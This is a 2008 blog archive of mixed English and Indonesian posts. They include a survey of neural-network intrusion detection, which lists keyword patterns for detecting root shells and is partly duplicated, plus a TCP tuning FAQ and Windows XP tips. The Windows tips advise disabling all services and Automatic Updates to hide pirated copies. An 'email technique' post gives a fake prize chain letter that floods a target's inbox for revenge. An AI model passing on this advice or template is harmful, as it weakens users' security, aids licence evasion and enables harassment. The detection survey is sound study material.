IDS sensors are potentially as valuable a resource (if not more so) as the network elements they serve to protect. Patch levels should be kept current, and routines should be implemented to reduce the volume of log data that accumulates on the sensors. Where possible, efforts should be taken to conceal the very existence of sensors as the information they contain could contribute significantly to the compromise of several additional systems. In short, recognize the IDS as an asset with significant potential for either network protection or compromise and defend it accordingly.

Application of Neural Networks to Intrusion Detection

2008-03-25T11:58:00.001-07:00

Introduction

Intrusion Detection Systems ( IDS ) are now mainly employed to secure company networks. Ideally, an IDS has the capacity to detect in real-time all ( attempted ) intrusions, and to execute work to stop the attack ( for example, modifying firewall rules ). We present in this paper a « state of the art » of Intrusion Detection Systems, developing commercial and research tools, and a new way to improve false-alarm detection using Neural Network approach. This approach is still in development, nevertheless it seems to be very promising for the future.

This paper is organized as follows : first, we present the global architecture of IDS and a few commercially available tools, then we analyze new axes of research to improve IDS’s performances and particularly the application of Neural Networks to Intrusion Detection.

Classification of Intrusion Detection Systems

A guidance document on Intrusion Detection Systems is available from National Institute of Standards and Technology ( NIST ) organization [1].

Intrusion Detection Systems can be classified into three categories :

host-based IDS, evaluate information found on a single or multiple host systems, including contents of operating systems, system and application files.
network-based IDS, evaluate information captured from network communications, analyzing the stream of packets traveling across the network. Packets are captured through a set of sensors.
vulnerability-assessment IDS, detect vulnerabilities on internal networks and firewalls

There are two primary models to analyzing events to detect attacks:

misuse detection model : IDS detect intrusions by looking for activity that corresponds to known signatures of intrusions or vulnerabilities
anomaly detection model : IDS detect intrusions by searching « abnormal » network traffic

Most IDS commercial tools refer to the misuse detection model, and signatures of intrusions must always be updated by vendors.

IDS based on anomaly detection model have the ability to detect symptoms of attacks without specifying model of attacks, but they are very sensitive to false alarms.

Commercially available tools

A Jackson [2] of Los Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :

suitability for IDS architecture and management scheme
flexibility of adaptation for a specific network to be monitored
protection against malicious tampering
interoperability with other network management and security tools
comprehensiveness, to expand the concept of intrusion detection such as blocking Java applets or Active-X controls, monitoring e-mail content, blocking specific urls
event management, such as managing and reporting event trace, updating attack database
active response when an attack occurs, such as firewall or router reconfiguration
support for product

Another recent market survey of commercially available Intrusion Detection tools today is available in [3]. We present here examples of IDS tools, classified according to the three models : host-based, network-based and vulnerability-assessment tools

Host-based IDS tools

Host-based IDS systems detect attacks for an individual system, using system logs and operating system audit trials. Examples of well known host-based commercial tools are : Cybercop from Network Associates ( NAI ) ( http://www.pgp.com ), KaneSecurity Monitor ( KSM ) from RSA Security ( http://www.rsasecuriy.com ). Tripwire ( http://www.tripwire.org ) is a specific tool to detect changes of administrative or user files on one server.

Network-based IDS tools

Network-based IDS systems detect attacks by capturing and analyzing network packets, from « sensors » placed at various points in a network. Examples of well known Network-based commercial tools are : RealSecure from Internet Security Scanner ( ISS ) ( http://www.iss.net ), Cisco Secure IDS or NetRanger from Cisco Systems ( ex Wheel Group Corporation ), Centrax from CyberSafe corporation, and Network Flight Recorder NFR

A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org )

The main difficulty for Network-based IDS is to process in real-time all packets for a large network ; specific hardware solutions may be employed. Another problem is segmentation of networks by switches which involve difficulties in capturing traffic for a global network.

Vulnerability-assessment tools

Vulnerability-assessment tools are security scanners used to detect known vulnerabilities on specific Operating System’s configuration. Examples of well-known vulnerability-assessment tools are : CyberCop Scanner from PGP Security ( a Network Associates Division ) and SecureScan NX from Networks Vigilance ( formally known as NV e-secure ).

A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. Deraison

Performances for commercial tools

The majority of tools available today refer to the misuse detection model, meaning that administrators need to regularly update vulnerabilities database. Then, all these tools are vulnerable to new signatures of attacks.

Tools are also very sensitive to false attacks, corresponding to normal network traffic.

Major commercial IDS do not handle Fragmentation / re-assembly of IP packets.

For large networks, it would be necessary to store Gigabytes of event data every day, to treat them off-line.

Application of Neural Networks to Intrusion Detection

The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.

Approaches for misuse detection

Approaches for the misuse detection model are :

expert systems, containing a set of rules that describe attacks
signature verification, where attack scenarios are translated into sequences of audit events
petri nets, where known attacks are represented with graphical petri nets
sate-transition diagrams, representing attacks with a set of goals and transitions

The common approach for misuse detection concerns « signature verification », where a system detects previously seen, known attacks by looking for an invariant signature left by these attacks. This signature is found in audit files, in host-intrused machine, or in sniffers looking for packets inside or outside of the attacked machine.

Limitation of this approach is due to :

frequent false-alarm detection
the need to specify a signature of the attack, and then to update signature of attacks on every IDS tool. A signature of an attack may not be easily discovered.
new attack signatures are not automatically discovered without update of the IDS

Approaches for anomaly detection

Anomaly Detection in Network-based or Host-based IDS includes :

threshold detection detecting abnormal activity on the server or network, for example abnormal consumption of the CPU for one server, or abnormal saturation of the network
statistical measures, learned from historical values
rule-based measures, with expert systems
non-linear algorithms such as Neural Networks or Genetic algorithms

The common approach for anomaly detection concerns the statistical analysis, where the user or the system behavior is measured by a number of variables over the time. These variables may be the login and the logout time of each session, the amount of resources consumed during the session, and the resource duration. The major limitation of this approach is to find a correct threshold without frequent false-alarm detection.

DARPA Intrusion Detection Data Base

To improve performances of IDS systems with real network traffic, a large-scale realistic Intrusion Detection data-base has been sponsored by the US Defense Advanced Research Projects Agency ( DARPA ) in 1998. More than two months of traffic observed from US Government sites and the Internet were registered, adding attacks against various hosts OS. DARPA data-base was then designed to evaluate performances of Intrusion Detection Systems. The first evaluation with off-line and real-time Data Base was conducted in the summer of 1998 [5].

Neural Network approach for Intrusion Detection

One promising research in Intrusion Detection concerns the application of the Neural Network techniques, for the misuse detection model and the anomaly detection model. Performance evaluations presented in this paper all refer to the DARPA Intrusion Data Base.

Neural Network approach

An artificial Neural Network consists of a collection of treatments to transform a set of inputs to a set of searched outputs, through a set of simple processing units, or nodes and connections between them. Subsets of the units are input nodes, output nodes, and nodes between input and output form hidden layers ; the connection between two units has some weight, used to determine how much one unit will affect the other. Two types of architecture of Neural Networks can be distinguished :

Supervised training algorithms, where in the learning phase, the network learns the desired output for a given input or pattern. The well known architecture of supervised neural network is the Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern Recognition problems.
Unsupervised training algorithms, where in the learning phase, the network learns without specifying desired output. Self-Organizing Maps ( SOM ) are popular unsupervised training algorithms ; a SOM tries to find a topological mapping from the input space to clusters. SOM are employed for classification problems.

A good introduction to Neural Networks is available in [6]. The most important property of a Neural Network is to automatically learn / retrain coefficients in the Neural Network according to data inputs and data outputs. Applying the Neural Network (NN) approach to Intrusion Detection, we first have to expose NN to normal data and to attacks to automatically adjust coefficients of the NN during the training phase. Performance tests are then conducted with real network traffic and attacks.

Neural Networks have been largely employed with success for complex problems such as Pattern Recognition, hand-written character recognition, Statistical Analysis. We present four recent studies on the application of the Neural Network approach to the scope of Intrusion Detection, both for the misuse detection model and the anomaly detection model.

Representation of a Perceptron with one Hidden Layer ( from [8] )

Georgia University neural network IDS

J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.

The MLP prototype had these characteristics : 4 fully connected layers, 9 input nodes and 2 output nodes ( normal and attack ). With this prototype, they simulated specific attacks as ISS scans, SATAN scans and SYNFlood, and each attack was clearly identified through normal traffic.

A MLP/SOM prototype was then designed to detect dispersed and possibly collaborative attacks. Neural Network was a feed-forward network with back-propagation learning. In the learning phase, Neural Network converged rapidly. Preliminary results with unsuccessful FTP login attempts where correctly identified as attacks.

MIT research in neural network IDS

R Lippmann and R Cunningham [8, 9] of the MIT Lincoln Laboratory also conducted tests applying Neural Networks to misuse detection model, by searching for attack-specific keywords in the network traffic. They used a Multi-Level Perceptron (MLP) to detect Unix-host attacks, and attacks to obtain root-privilege on a server. Generic keywords are selected to detect attack preparations and actions executed after.

A two-layer perceptron was designed with k input nodes, 2k hidden nodes and 2 outputs ( normal and attack ) ; backpropagation in the learning phase detects weights of the Neural Network. Good detection performance was obtained with 30 keywords to detect attacks, such as « cat > », « uudecode » or new root shell (« uid=0(root) », « bash# »).

Applied to Shell source code with 7 shell-commands representing an attack, 17 out of 20 attacks were detected and one false alarm generated ; applied to C source code with 2 features, 68 of 73 attacks were detected and 4 false alarms.

With the Neural Network approach, false alarms were reduced by two orders of magnitude ( to roughly one false alarm per day ) and they increased the detection rate to roughly 80 % with the DARPA data base. System could detect old as well as new attacks not included in the training data, and in a lesser extent attacks distributed across multiple sessions.

UBILAB Laboratory

Luc Girardin of the UBILAB laboratory [ 10, 11] also employed Self-Organizing Maps ( SOM ) to perform clustering of network traffic and detect attacks based upon Neural Network, associated with a visual approach of network traffic. SOM are employed to project network events on an appropriate 2D-space for visualization, and then they are displayed to the Network Administrator with a comprehensive view of traffic. Intrusions are then easily extracted from this view, by highlighting divergence from the norm with visual metaphors of network traffic.

Girardin tested this approach with success for the following attacks : IP spoofing, FTP password guessing, network scanning and network hopping ; log file systems are analyzed from firewalls. However, this approach needs a visual interpretation of network traffic by an administrator to detect attacks.

Research of RST Corporation

A Ghosh and A Schwartzbard [12] of Reliable Software Technologies Corp. used the Neural Network approach for the anomaly detection model by analyzing program behavior profiles for Intrusion Detection. Program behavior profiles are built by capturing system calls made by the program, to monitor the behavior of programs by noting irregularities in program behavior.

Their IDS was a single hidden layer Multi-Layer Perceptron (MLP) ; they also employed the so-called Lucky Bucket algorithm to keep in mind temporal memorization of recent abnormal events, by managing a counter : for a normal output, the counter tends to be zero, and for an anomaly the counter tends to be one.

Performance for their system was tested with the DARPA data-base, including intrusive and non-intrusive sessions. Applied to anomaly detection, system detects with good performances known and new attacks ( 77 % of attacks where detected with 3 % of false alarms ), but application to misuse detection detects attacks with high false alarm rates, excluding usage for commercial use. In 1998, with the DARPA off-line IDS evaluation, the system successfully detected User-to-Root attacks composed of system-call sequences.

In order to improve the anomaly detection model, A Ghosh et al. [13] then tested Intrusion Detection to another topology of Neural Network, the Elman Network for recognizing recurrent features in program execution traces. An Elman Network is based on a feed-forward topology with the addition of context nodes retaining information from previous inputs. Applied to the DARPA database, the Elman Networks were able to detect 77 % of attacks with no false alarm, improving results obtained with the MLP topology.

In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.

Conclusion

Intrusion Detection Systems are becoming largely employed as a fundamental Network Security system. Commercial tools available today have limitations in detecting real intrusions, and Neural Network is a efficient way to improve the performances of IDS systems which are based on the misuse detection model and the anomaly detection model.

Application of Neural Networks to Intrusion Detection

2008-03-25T11:58:00.000-07:00

Introduction

Classification of Intrusion Detection Systems

A guidance document on Intrusion Detection Systems is available from National Institute of Standards and Technology ( NIST ) organization [1].

Intrusion Detection Systems can be classified into three categories :

host-based IDS, evaluate information found on a single or multiple host systems, including contents of operating systems, system and application files.
network-based IDS, evaluate information captured from network communications, analyzing the stream of packets traveling across the network. Packets are captured through a set of sensors.
vulnerability-assessment IDS, detect vulnerabilities on internal networks and firewalls

There are two primary models to analyzing events to detect attacks:

misuse detection model : IDS detect intrusions by looking for activity that corresponds to known signatures of intrusions or vulnerabilities
anomaly detection model : IDS detect intrusions by searching « abnormal » network traffic

Most IDS commercial tools refer to the misuse detection model, and signatures of intrusions must always be updated by vendors.

IDS based on anomaly detection model have the ability to detect symptoms of attacks without specifying model of attacks, but they are very sensitive to false alarms.

Commercially available tools

A Jackson [2] of Los Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :

suitability for IDS architecture and management scheme
flexibility of adaptation for a specific network to be monitored
protection against malicious tampering
interoperability with other network management and security tools
comprehensiveness, to expand the concept of intrusion detection such as blocking Java applets or Active-X controls, monitoring e-mail content, blocking specific urls
event management, such as managing and reporting event trace, updating attack database
active response when an attack occurs, such as firewall or router reconfiguration
support for product

Host-based IDS tools

Network-based IDS tools

A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org )

Vulnerability-assessment tools

A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. Deraison

Performances for commercial tools

Tools are also very sensitive to false attacks, corresponding to normal network traffic.

Major commercial IDS do not handle Fragmentation / re-assembly of IP packets.

For large networks, it would be necessary to store Gigabytes of event data every day, to treat them off-line.

Application of Neural Networks to Intrusion Detection

The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.

Approaches for misuse detection

Approaches for the misuse detection model are :

expert systems, containing a set of rules that describe attacks
signature verification, where attack scenarios are translated into sequences of audit events
petri nets, where known attacks are represented with graphical petri nets
sate-transition diagrams, representing attacks with a set of goals and transitions

Limitation of this approach is due to :

frequent false-alarm detection
the need to specify a signature of the attack, and then to update signature of attacks on every IDS tool. A signature of an attack may not be easily discovered.
new attack signatures are not automatically discovered without update of the IDS

Approaches for anomaly detection

Anomaly Detection in Network-based or Host-based IDS includes :

threshold detection detecting abnormal activity on the server or network, for example abnormal consumption of the CPU for one server, or abnormal saturation of the network
statistical measures, learned from historical values
rule-based measures, with expert systems
non-linear algorithms such as Neural Networks or Genetic algorithms

DARPA Intrusion Detection Data Base

Neural Network approach for Intrusion Detection

Neural Network approach

Supervised training algorithms, where in the learning phase, the network learns the desired output for a given input or pattern. The well known architecture of supervised neural network is the Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern Recognition problems.
Unsupervised training algorithms, where in the learning phase, the network learns without specifying desired output. Self-Organizing Maps ( SOM ) are popular unsupervised training algorithms ; a SOM tries to find a topological mapping from the input space to clusters. SOM are employed for classification problems.

Representation of a Perceptron with one Hidden Layer ( from [8] )

Georgia University neural network IDS

J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.

MIT research in neural network IDS

UBILAB Laboratory

Research of RST Corporation

In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.

Conclusion

FAQ - Frequently asked questions about Network parameters optimized by SpeedConnec

2008-03-25T11:53:00.000-07:00

Maximum Transmission Unit (MTU)
This is the default packet size that Windows uses to negotiate with. When a connection is opened between two computers, they must agree on an MTU. This is done by comparing MTUs and selecting the smaller of the two. If the MTU is set too large for routers that are between the computers, these routers then fragment this information into a packet size that the router can handle. This fragmentation can double the amount of time it takes to send a single packet. Windows has a built-in MTU Discovery that will adjust for this by sending out a packet that is marked as "Not Fragmentable". Then the router sends back an error to the computer saying that the packet was too large, and Windows then lowers the MTU until there are no more errors. If your ISP uses an MTU of 576, then every time you start a connection, Windows must adjust down to this value. Even though Windows automatically adjusts the packet size, it still takes it time to negotiate an acceptable MTU. By setting this value manually, you greatly reduce the amount of work that Windows must do to negotiate.

Maximum Segment Size (MSS)
Maximum Segment Size defines the largest segment of data that the TCP stack is prepared to receive. When a connection is established, the two ends agree to use the smaller of each end's value. MSS is generally 40 bytes less than Maximum Transmission Unit, because 40 bytes are used for the TCP and IP headers.

TCP Receive Window Size (RWIN)
The TCP Receive Window Size is the amount of receive data (in bytes) that can be buffered at one time on a connection. The sending host can send only that amount of data before waiting for an acknowledgment and window update from the receiving host. A value that's too large will result in greater loss of data if packets are lost or damaged, and a value that's too small will slow down data transfer considerably, as each packet will have to be acknowledged before the next packet is sent. Matching the receive window to even increments of the MSS increases the percentage of full-sized TCP segments utilized during bulk data transmission.

Time To Live (TTL)
This parameter specifies the default Time To Live (TTL) value that is set in the header of outgoing IP packets. The TTL determines the maximum time that an IP packet can live in the network without reaching its destination. It is effectively a limit on the number of routers an IP packet can pass through before it is discarded.

Keep Alive Time
Specifies how often to send session keepalive packets on active sessions. This will keep connections that have stalled during a particular download session from timing out. The minimum is 1 minute (60000 ms). Recommended setting is 10 minutes (600000 ms).

Path MTU - Enable Black Hole Detect
This specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. ICMP (Internet Control Message Protocol) is defined in STD5, RFC 792. With this feature enabled, TCP will try to send segments without the Don't Fragment bit set if several re-transmissions of a segment go unacknowledged. If the segment is acknowledged as a result, the MTU will be decreased and the Don't Fragment bit will be set in future packets on the connection. Enabling black hole detection increases the maximum number of re-transmissions performed for a given segment. Setting this parameter when it is not needed can cause performance degradation. However, if the router is not sending back the ICMP messages, then PMTU Discovery will not work. This can cause an even greater loss of performance. PMTU Black Hole Detect is recommended to be disabled.

Path MTU - Enable Auto Discovery
Enabling this setting causes TCP to attempt to discover the Maximum Transmission Unit (MTU or largest packet size) over the path to a remote host. By discovering the Path MTU and limiting TCP segments to this size, TCP is supposed to be able to eliminate fragmentation at routers along the path that connect networks with different MTUs. This requires implementation of the corresponding server side algorithm, however, and presupposes all of the servers on the entire Internet only running MSFT server software with server-side optimization features accessible from MSFT web-browser client software. Needless to say, this is rather unlikely. Nevertheless, it is not recommended to disable this setting as it would then cause an MTU of 576 bytes to be used for all connections that are not to machines on the local subnet. Disabling this setting can cause severe performance degradation because fragmentation may not be compensated for. PMTU Auto Discovery is recommended to be enabled.

Enable Selective Acknowledgements (SACK)
This parameter controls whether or not Selective Acknowledgment (SACK) support, as specified in RFC 2018, is enabled. Selective Acknowledgement (SACK) is an optimizing feature that lets you acknowledge receipt of individual blocks of data in a continuous sequence, rather than just the last sequence number. The recipient can tell the sender that one or more data blocks are missing from the middle of a sequence, and the sender can retransmit only the missing data.

Max Duplicate ACKs
This parameter determines the number of duplicate ACKs that must be received for the same sequence number of sent data before fast retransmit is triggered to resend the segment that has been dropped in transit.

TCP Window Scaling (RFC 1323)
Receive window scaling permits TCP to negotiate a scaling factor for the TCP receive window size, allowing the use of a very large TCP receive window size (RWIN). This option must be enabled in order to use a receive window size (RWIN) larger than 64 KB.

Timestamps (RFC 1323)
Timestamps help TCP to measuring round trip time (RTT) accurately in order to adjust retransmission timeouts. The Timestamps option provides two four-byte timestamp fields in the TCP header, one to record the time the initial transmission is sent and one to record the time on the remote host. Since this option increases packed header overhead and don't provide much of an improvement, it is recommended to be disabled. This option is specified in RFC 1323.

Session Keep Alive
This value determines the time interval between keepalive transmissions on a session. Recommended value is 60000 ms (10 minutes).

Internet Explorer: MaxConnectionsPerServer
This value limits the number of concurrent connections to a web server.

Quality and Type Of Service : DisableUserTOSSetting
This parameter can be used to allow programs to manipulate the Type Of Service (TOS) bits in the header of outgoing IP packets.

LAN Settings : LAN Request Buffer Size
This parameter can be used to reduce local area network delays.

LAN Settings : Increase LAN Browsing Speed
This option disables the network task scheduler leading to faster browsing of network folders.

Host Resolution Priority
This option group allows settings the priority level for LocalPriority (local names cache), HostsPriority (the hosts file), DnsPriority (DNS) and NetbtPriority (NetBT name resolution, WINS).

NetBIOS over TCP/IP: BcastNameQueryCount
This value determines the number of times NetBT broadcasts a query for a particular name without receiving a response.

NetBIOS over TCP/IP: BcastQueryTimeout
This value determines the time interval between successive broadcast name queries for the same name.

NetBIOS over TCP/IP: CacheTimeout
This value determines the time interval (in miliseconds) that names are cached for in the remote name table.

DNS Cache Parameters
MaxNegativeCacheTTL limits the negative DNS query answer cache time. NegativeSOACacheTime limits the negative answer to SOA DNS query cache time. NetFailureCacheTime value determines the time to stop sending DNS queries if no answer is received.

Amankan windows

2008-03-25T06:09:00.000-07:00

Dari hasil polling yang dilakukan oleh berbagai media cetak maupun elektronik, ternyata lebih dari 90% para pengguna komputer memilih Microsoft Windows untuk sistem operasinya. Hal ini terutama karena kemudahan penggunaan dan kaya fitur (menurut mereka sich..). Padahal kita tau sendiri banyaknya laporan kelemahan-kelemahan yang ada pada windows dan banyaknya serangan-serangan yang terjadi baik karena ulah Hacker, Virus, Trojan dan saudara-saudaranya. Karena itulah pada artikel kali ini Spyro akan memberikan sedikit tips yang bisa anda kembangkan sendiri untuk mengamankan windows XP anda sehingga anda dapat bermain dengan nyaman bersamanya.

1. PARTISI NTFS

Instal Windows XP anda pada partisi NTFS. Hal ini dibutuhkan bagi admin agar dapat memanfaatkan fasilitas File Permission untuk mengatur user dalam hal pembatasan hak akses. Lakukan konversi jika anda tidak menginstal windows XP anda pada partisi NTFS dengan cara:

1) Masuklah ke command prompt (start-> run -> cmd.exe)

2) Lalu ketiklah convert c: /FT:NTFS /v

2. AKTIFKAN PASSWORD BIOS

Sangat penting bagi anda untuk mengaktifkan password bios agar orang lain tidak seenaknya bisa memboot komputer anda. Hal ini juga penting jika anda menginstal Deepfreeze pada komputer anda karena orang lain bisa memanfaatkan bios untuk melakukan hacking deepfreeze (Baca artikel-artikel terdahulu tentang Hacking Deepfreeze).

3. MANFAATKAN SYSKEY

Windows XP memiliki fasilitas pengaman yang akan meminta user untuk memasukkan password tatkala ia startup. Oh, apakah password bios saja tidak cukup? Jangan lupa, sekarang ini ada banyak cara bagi orang lain untuk bisa meng-hack password bios anda. Untuk mengatur agar komputer anda meminta password tatkala startup, anda dapat memanfaatkan SYSKEY:

1) Masuklah ke dialog syskey dengan cara start -> run lalu ketik syskey

2) Klik Update kemudian pilihlah Password Startup

3) Masukkan password anda disana. Dalam penulisan password, gunakan kata kunci yang sesulit mungkin namun mudah anda ingat. Jangan menggunakan hal-hal yang berhubungan dengan anda Sebagai password karena orang lain bisa saja menebak password anda dengan mudah.

4. WELCOME SCREEN

Pada welcome screen biasanya akan menampilkan daftar nama user pengguna komputer. Jangan memberikan hak seingkat admin pada siapapun kecuali anda! Ingat!! Trust Nobody! Pastikan juga username anda dalam keadaan terpassword.

5. DISABLE SERVICES YANG TIDAK DIBUTUHKAN

Diaktifkannya service-service default dapat membuka celah keamanan. Klik kanan pada My Computer kemudian klik Manage lalu masuklah ke Services and Applications dan pilih Services. Disable semua service yang ada di bagian ini.

6. DISABLE ERROR REPORTING DAN AUTOMATIC UPDATES

Windows XP memiliki fasilitas Error Reporting yang nantinya akan dikirim ke microsoft. Apabila anda memakai produk bajakan, pihak microsoft akan tau dan akan memutus service yang mereka berikan. Karena itu ada baiknya anda mendisable Error Reporting sehingga pihak microsoft tidak mengetahui bahwa windows anda bajakan.

Automatic Updates juga salah satu fasilitas yang akan langsung menghubungkan komputer kita dengan situs microsoft dan secara otomatis pihak microsoft akan tau apakah windows XP kita produk legal atau bajakan.

Untuk mendisable Error Reporting: Masuklah ke Control panel kemudian buka Performance and Mainternance -> System -> advanced -> Error Reporting dan disable semuanya.

Untuk mendisable Automatic Updates: Masuklah ke Control panel kemudian buka Performance and Mainternance -> System -> automatic updates dan disable updates.

Setelah anda melakukan keduanya, cobalah untuk melakukan langkah 5 untuk mendisable services Error Reporting dan Automatic updates.

7. FIREWALL

Port yang terbuka bisa dijadikan sebagai jalan masuk bagi mahluk-mahluk maya yang tidak anda inginkan. Banyak sekali saya dengar suatu komputer dapat diterobos dengan mudah melalui port yang terbuka. "Eh, khan udah jelas kalo serangan dilakukan melalui port yang terbuka, lalu kenapa gak ditutup ajah semua portnya?" Hehehe.. port itu ibarat pintu rumah. Kalo semua pintu rumah kita hilangkan dan semuanya ditembok, mungkin barang-barang di rumah anda akan aman dari pencuri, tapi bagaimana cara anda keluar rumah jika tidak ada pintu? Hal serupa juga terjadi pada komputer anda, mungkin anda akan aman dari serangan dari luar tapi anda tidak akan memiliki jalan untuk melakukan hubungan keluar. Solusinya? Aktifkan firewall anda untuk meremote port-port yang terbuka. Anda dapat menggunakan Zone Alarm dan sejenisnya demi keamanan komputer anda.

8. ANTIVIRUS

Meskipun kita dapat menghindari Virus, Trojan dan Spyware dengan tangan kosong (baca tiips-trik aman dari virus tanpa antivirus di artikel terdahulu) namun demi kemudahan pekerjaan dan lebih terjaminnya keamanan kita perlu untuk menginstal antivirus. Jangan lupa untuk pandai-pandai memilih antivirus yang tepat dan rajin melakukan update virus definition terbaru.

9. HAPUS FILE-FILE "SAMPAH" DAN JEJAK ANDA

Setiap anda beraktivitas entah itu browsing ke suatu situs atau membuka file, komputer selalu mencatat jejak anda, membuat suatu file temporary dan shortcut agar suatu ketika anda dapat membuka file itu atau situs tersebut dengan lebih cepat. Hal ini tentunya mengancam privasi anda bukan? Dan tentunya, file-file jejak yang menumpuk akan memakan freespace harddisk anda. Gunakan aplikasi penghapus jejak dan penghapus file-file sampah untuk mengatasi hal ini. Pilih-pilih sendiri aplikasinya di halaman Untility (pada halaman member www.spyrozone.tk).

Berpromosi blog

2008-03-25T03:29:00.000-07:00

Ini untuk para beginner didunia blog...........,,,,, setelah kamu membuat blog, ada baiknya untuk mempromosikan blog kamu. Hal ini bertujuan supaya blog kamu dapt banyak pengunjung,,,,, itu kan yang kita inginkan untuk blog kita,,,,,,,. Jadi tunggu apa lagi daftarin segera blog kamu untuk dapat dipromosiin. Nih.. ada beberapa buah link untuk berpromosi :

Technorati.com

Email Technique

2008-03-24T21:42:00.000-07:00

Saya (setelah sekian lama) baru menemukan konsep yang menarik setelah membaca ulang sebuah email yang dikirim ke saya. Isi email persisnya saya lupa, intinya saya mendapati email forward yang berisikan tawaran menarik apabila saya memforward lagi ke teman-teman dengan tetap menambahkan CC (carbon copy) ke email tertentu.

Dalam hal ini alamat email CC adalah si target flooding email. Dengan memakai metode ini kemungkinan email masuk kategori SPAM akan kecil, karena dikirim oleh alamat email yang valid (legit) dan tentu saja memenuhi inbox si target.
Ya, ini adalah teknik yang digunakan oleh penyerang (A) untuk membanjiri INBOX targetnya (B).

Kisah yang mungkin bisa ditelaah seperti berikut:
A seorang Kepala divisi Marketing Perusahaan XYZ yang baru saja dipecat karena telah difitnah oleh B (boss dari A, koruptor sebenarnya) dengan tuduhan korupsi sebesar 2Milyar.
Maka si A pun memutar otak bagaimana supaya bisa balas dendam terhadap B. Kesalahan dilakukan oleh manajemen Perusahaan XYZ (keberuntungan buat si A) karena tidak segera menghapus email account si A, maka dia pun pergi ke warnet dan login ke webmail Perusahaan XYZ dan memulai mengetikkan jari-jarinya ke keyboard.
Singkat kata, A mengirim email ke 10 orang temannya yang isinya kurang lebih:

Hello Teman,

Saya adalah Kepala divisi Marketing Perusahaan XYZ.
Dalam rangka perayaan ULTAH yang ke-10, Perusahaan kami sedang mengadakan sayembara berhadiah 1 mobil Ford Focus bagi siapa saja yang mengirimkan/memforward email ini ke teman yang lain dengan mengikutsertakan CC: ke email B. Ini kami perlukan untuk mendata siapa dan berapa jumlah forward yang telah dikirim. Bagi pengirim terbanyak akan segera mendapat email konfirmasi dari kami paling lambat 1 minggu setelah sayembara ini ditutup.

...
bla bla bla
...
~ditambah attachment sehingga email size: 100Kb

Siapa yang tidak tertarik dengan iming-iming Ford Focus? Apalagi hanya butuh beberapa klik dan sentuhan keyboard. Hasilnya, 10 teman si A tadi segera memforward ke daftar kontak mereka. Paling sedikit masing-masing memforward ke 10 teman yang lain

A --> A' --> A'' --> A'''--> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | | |-> A''''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| | |-> A'''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
|
|-> A' --> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
| |-> A''
|-> A'
|-> A'
|-> A'
|-> A'
|-> A'
|-> A'
|-> A'
|-> A'

Dengan hitungan kasar:
A' -> A'' = 10 x 1 = 10 --> CC ke INBOX B
A'' -> A''' = 10 x 10 = 100 --> CC ke INBOX B
A''' -> A'''' -> 10 x 10 x 10 = 1000 --> CC ke INBOX B

Sampai sini bisa kita hitung:
Total EMail yang di-CC ke B = 10+100+1000=1110
Total Size yang di-CC ke B = 1110x100Kb= 111.000Kb
= 111Mb

111 Mb email (sampah) masuk ke INBOX B!!
Belum lagi apabila A'''' memforward ke masing-masing 10 teman lagi dan seterusnya. Mungkin tidak hanya 10 teman, bukankah semakin banyak memforward akan semakin besar kemungkinan Ford Focus ada di garasi kita? Ok saya mempunyai 100 daftar kontak mulai dari teman SD, SMP, SMA, teman kuliah sampai teman kantor, saya pasti akan memforward ke mereka semua. Katakan tingkat keberhasilan (yang memforward lagi) ada 25%, maka 25 dari mereka akan melakukan hal yang sama ke daftar kontak mereka. Dan BUMMM!!

Apabila kapasitas mailserver B hanya 100MB maka hancurlah Perusahaan XYZ, karena Mailbox nya dipenuhi oleh Sampah hasil balas dendam si A. Mengingat semua transaksi yang masuk hanya melalui email si B, maka email yang masuk akan segera mengalami BOUNCE (dikirim balik ke pengirim) karena mailbox sudah penuh (overload). Dalam beberapa bulan saja Perusahaan XYZ gulung tikar karena tidak ada transaksi sama sekali.

Yang dapat kita petik dari sepenggal kisah di atas yaitu kita jangan mudah tertipu oleh email yang menawarkan iming-iming uang, diskon belanja, hadiah mobil, dll yang pada dasarnya hanyalah usaha untuk melakukan Flooding ke Mailbox sesorang yang telah menjadi target.

Penulis tidak bertanggung jawab atas segala sesuatu yang timbul akibat artikel ini, karena tulisan ini hanya ditujukan untuk pembelajaran etika dalam ber-email.
Salam.

MENCARI DAN MEMPERBAIKI FILE SYSTEM YANG RUSAK

2008-03-24T21:35:00.000-07:00

Komputer sering hang, atau aplikasi-aplikasi sering tidak dapat berjalan optimal?? Salah satu penyebabnya bisa jadi karena ada file system yang rusak pada windows anda. Berikut ini langkah-langkah untuk mengetahui adanya kerusakan file system tersebut.

1. Klik [start][programs][accessories][system tools][system information]

2. Klik menu [tools][system file checker] lalu klik opsi [scan for altered files] kemudian klik [start].

